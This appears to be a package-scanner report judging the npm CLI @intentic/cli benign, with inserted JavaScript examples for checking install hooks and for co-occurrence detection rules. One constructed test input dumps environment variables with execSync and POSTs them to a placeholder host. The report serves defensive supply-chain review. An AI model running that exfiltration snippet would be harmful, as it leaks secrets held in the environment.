@intentic/cli@1.78.0

AI Security Review

scanned 22h ago · by lpm-firewall-ai

No confirmed malicious attack surface. Sensitive filesystem, subprocess, SSH, Docker, and network behavior is tied to explicit deployment/demo CLI commands for an infrastructure tool.

Static reason
One or more suspicious static signals were detected.
Trigger
User invokes intentic commands such as init, resolve, apply, or demo modes
Impact
Creates local scaffold files and may provision/update infrastructure described by user intent
Mechanism
user-directed deployment orchestration CLI
Rationale
Static inspection shows an intent-driven deployment CLI with no lifecycle hooks, no unconsented AI-agent control-surface writes, and no credential harvesting or exfiltration beyond user-directed provider/API use. Scanner hits are package-aligned runtime capabilities for scaffolding, resolving, applying, and demo orchestration.
Evidence
• package.json
• dist/cli.js
• dist/app.js
• dist/init/init.js
• dist/init/scaffold-app.js
• dist/resolve/resolve.js
• dist/apply/apply.command.js
• dist/demo.js
• README.md
• intent/deploy.config.ts
• intent/package.json
• intent/tsconfig.json
• intent/.gitignore
• desired-state/.gitignore
• desired-state/desired-state.json
• desired-state/status.json
• desired-state/access.md
• desired-state/.env.example
• desired-state/.secrets.json
• app/package.json
• app/server.js
• app/Dockerfile
• app/.gitignore
• .demo/state.json
Network endpoints (6)
• api.cloudflare.com/client/v4/accounts/{accountId}/cfd_tunnel/{tunnelId}/connections
• git.{zone}
• deploy.{zone}
• app.{zone}
• 127.0.0.1:{forgejoPort}
• 127.0.0.1:{komodoPort}

Decision evidence

public snapshot
AI called this Clean at 92.0% confidence as Benign with low false-positive risk.
Evidence for block
    • none listed
    Evidence against
    • package.json has no npm lifecycle hooks; only bin intentic -> dist/cli.js
    • dist/cli.js only invokes stricli app routing; no import-time install mutation
    • dist/init/init.js scaffolds intent/desired-state/app dirs and runs git/pnpm only when user invokes init
    • dist/resolve/resolve.js dynamically imports user config and reads Cloudflare token for package-aligned zone discovery
    • dist/apply/apply.command.js reconciles user artifact, writes status/access files, and posts optional user-provided Discord webhook
    • dist/demo.js Docker/SSH/Cloudflare actions are demo-mode runtime behavior, not install-time execution
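    The first two "Evidence against" items are the cheapest to reproduce by hand: read package.json, list any npm lifecycle script that would run without a user-invoked command, and list the bin entry points. The following is an added example, not code from @intentic/cli or from the scanner; the manifest objects are constructed from the facts stated on this page (no lifecycle hooks, bin intentic -> dist/cli.js), and the hook list is npm's documented lifecycle scripts.

```javascript
// Added example (not part of @intentic/cli or the scanner): separate
// install-time code from user-invoked code by reading a package.json object.

// npm lifecycle scripts that run without an explicit user command. The
// publish-side ones (prepare, prepack, ...) also run for git dependencies, so
// they are included to keep the check conservative.
const LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall",
  "prepublish", "prepare", "prepublishOnly", "prepack", "postpack",
];

// Returns the hooks that would run at install time, the CLI entry points the
// package exposes, and any entry point that resolves outside the package root.
function installSurface(manifest) {
  const scripts = manifest.scripts || {};
  const hooks = LIFECYCLE_HOOKS
    .filter((name) => typeof scripts[name] === "string")
    .map((name) => ({ name, command: scripts[name] }));

  // "bin" is either a string (command named after the package) or an object.
  let bin = {};
  if (typeof manifest.bin === "string") {
    const cmd = (manifest.name || "").split("/").pop();
    bin = { [cmd]: manifest.bin };
  } else if (manifest.bin && typeof manifest.bin === "object") {
    bin = { ...manifest.bin };
  }

  // An entry point like "../x" or "/usr/..." points outside the package.
  const escapingBins = Object.entries(bin)
    .filter(([, target]) => target.startsWith("..") || target.startsWith("/"))
    .map(([cmd]) => cmd);

  return { hooks, bin, escapingBins, runsOnInstall: hooks.length > 0 };
}

// Constructed manifest mirroring the evidence on this page (assumption: the
// build/test script names are invented; the real file is not reproduced here).
const intenticLike = {
  name: "@intentic/cli",
  version: "1.78.0",
  bin: { intentic: "dist/cli.js" },
  scripts: { build: "tsc -p tsconfig.json", test: "vitest run" },
};

// Constructed counter-example: the shape a reviewer would stop on.
const hookedPackage = {
  name: "example-pkg",
  version: "0.0.1",
  scripts: { postinstall: "node ./setup.js" },
};

console.log(installSurface(intenticLike).runsOnInstall);  // false
console.log(installSurface(hookedPackage).runsOnInstall); // true
```

    A manifest with no hooks only shows that nothing runs at install time; everything reachable through the bin entry still runs with the invoking user's privileges, which is why the remaining items in this list look at what each command does once invoked.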
    Behavioral surface
    Source
    Child Process · Crypto · Dynamic Require · Environment Vars · Filesystem · Network · Shell
    Supply chain
    High Entropy Strings · Url Strings
    Manifest: no manifest risk signals triggered.
    scanned 37 file(s), 89.3 KB of source, external domains: 127.0.0.1, api.cloudflare.com

    Source & flagged code

    4 flagged
    dist/init/scaffold-app.js
    1: import { execFile } from "node:child_process";
    2: import { mkdir, writeFile } from "node:fs/promises";
    High · Child Process

    Package source references child process execution.

    dist/init/scaffold-app.js, line 1
    dist/resolve/resolve.js
    6: export const loadIntent = async (configPath) => {
    7:     const loaded = (await import(pathToFileURL(resolve(configPath)).href));
    8:     if (loaded.intent === undefined) {
    Medium · Dynamic Require

    Package source references dynamic require/import behavior.

    dist/resolve/resolve.js, line 6
    dist/demo.js
    29: const komodoPort = config.demo.komodoPort;
    30: const GIT_URL = `https://git.${zone}`;
    31: const KOMODO_URL = `https://deploy.${zone}`;
    ...
    38: const cliEnv = {
    39:     ...process.env,
    40:     DEMO_DOH_ZONE: zone,
    ...
    43: const run = (command, args, env = process.env) => new Promise((resolve, reject) => {
    44:     const child = spawn(command, args, { cwd: repoRoot, env, stdio: ["ignore", "inherit", "inherit"] });
    45:     child.on("error", reject);
    High · Same File Env Network Execution

    A single source file combines environment access, network access, and code or shell execution; review context before blocking.

    dist/demo.js, line 29
    29: const komodoPort = config.demo.komodoPort;
    30: const GIT_URL = `https://git.${zone}`;
    31: const KOMODO_URL = `https://deploy.${zone}`;
    ...
    33: const log = (message) => {
    34:     process.stdout.write(`${message}\n`);
    35: };
    ...
    43: const run = (command, args, env = process.env) => new Promise((resolve, reject) => {
    44:     const child = spawn(command, args, { cwd: repoRoot, env, stdio: ["ignore", "inherit", "inherit"] });
    45:     child.on("error", reject);
    High · Command Output Exfiltration

    Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.

    dist/demo.js, line 29
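    Both High findings on dist/demo.js are co-occurrence rules: they fire when certain capability signals appear in one file, regardless of whether data flows between them. In the excerpt cited for "Command Output Exfiltration", the only output-handling line is the log helper's process.stdout.write, which is why the report says to review data flow before blocking. The following is an added example of that style of heuristic, not the scanner's code and not part of @intentic/cli; the regexes, the rule thresholds and the three sample inputs are assumptions (the demo-like input is assembled from the dist/demo.js lines quoted above, the other two are constructed).

```javascript
// Added example (not the scanner's code, not part of @intentic/cli): a
// minimal version of two co-occurrence heuristics applied to a file's source.
// The patterns below are assumptions; the real scanner's signatures are not
// published on this page.

// Capability signals: one matching pattern marks the capability as present.
const SIGNALS = {
  env:     [/\bprocess\.env\b/],
  network: [/\bfetch\s*\(/, /\bhttps?\.request\s*\(/, /https?:\/\//],
  exec:    [/\b(spawn|exec|execFile|execSync|spawnSync)\s*\(/],
  // "Output handling" is anything that touches stdout/stderr or captures a
  // command's result; a plain log helper is enough to trip it.
  output:  [/\bstd(out|err)\b/, /\b(execSync|spawnSync)\s*\(/],
};

// Map each capability to whether any of its patterns matches the source text.
function detectSignals(source) {
  const found = {};
  for (const [name, patterns] of Object.entries(SIGNALS)) {
    found[name] = patterns.some((re) => re.test(source));
  }
  return found;
}

// Co-occurrence rules, named as on this report. Neither rule checks that the
// executed command's output actually reaches the network call.
function coOccurrence(signals) {
  const findings = [];
  if (signals.env && signals.network && signals.exec) {
    findings.push("Same File Env Network Execution");
  }
  if (signals.exec && signals.output && signals.network) {
    findings.push("Command Output Exfiltration");
  }
  return findings;
}

// Constructed input assembled from the dist/demo.js lines quoted in this report.
const DEMO_LIKE = [
  'const komodoPort = config.demo.komodoPort;',
  'const GIT_URL = `https://git.${zone}`;',
  'const log = (message) => { process.stdout.write(`${message}\\n`); };',
  'const cliEnv = { ...process.env, DEMO_DOH_ZONE: zone };',
  'const run = (command, args, env = process.env) => new Promise((resolve, reject) => {',
  '  const child = spawn(command, args, { cwd: repoRoot, env, stdio: ["ignore", "inherit", "inherit"] });',
  '  child.on("error", reject);',
  '});',
].join("\n");

// Constructed input shaped like a user-directed API lookup: env + network, no exec.
const LOOKUP_LIKE = [
  'const token = process.env.CLOUDFLARE_API_TOKEN;',
  'const res = await fetch("https://api.cloudflare.com/client/v4/zones", {',
  '  headers: { authorization: `Bearer ${token}` } });',
].join("\n");

// Constructed input that really does ship command output off-host.
const EXFIL_LIKE = [
  'const out = execSync("env").toString();',
  'fetch("https://collector.invalid/c", { method: "POST", body: out });',
].join("\n");

console.log(coOccurrence(detectSignals(DEMO_LIKE)));   // both rules fire
console.log(coOccurrence(detectSignals(LOOKUP_LIKE))); // []
console.log(coOccurrence(detectSignals(EXFIL_LIKE)));  // ["Command Output Exfiltration"]
```

    The demo-like input trips both rules because spawn, a URL template, process.env and a log helper share one file; the lookup-like input, which handles a real credential, trips neither; the exfiltration-shaped input trips only the output rule. The heuristic ranks files worth reading, and the page's own rationale (what each command does when the user invokes it) is the step that actually decides.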

    Findings

    4 High · 3 Medium · 4 Low
    • High · Child Process · dist/init/scaffold-app.js
    • High · Shell
    • High · Same File Env Network Execution · dist/demo.js
    • High · Command Output Exfiltration · dist/demo.js
    • Medium · Dynamic Require · dist/resolve/resolve.js
    • Medium · Network
    • Medium · Environment Vars
    • Low · Scripts Present
    • Low · Filesystem
    • Low · High Entropy Strings
    • Low · Url Strings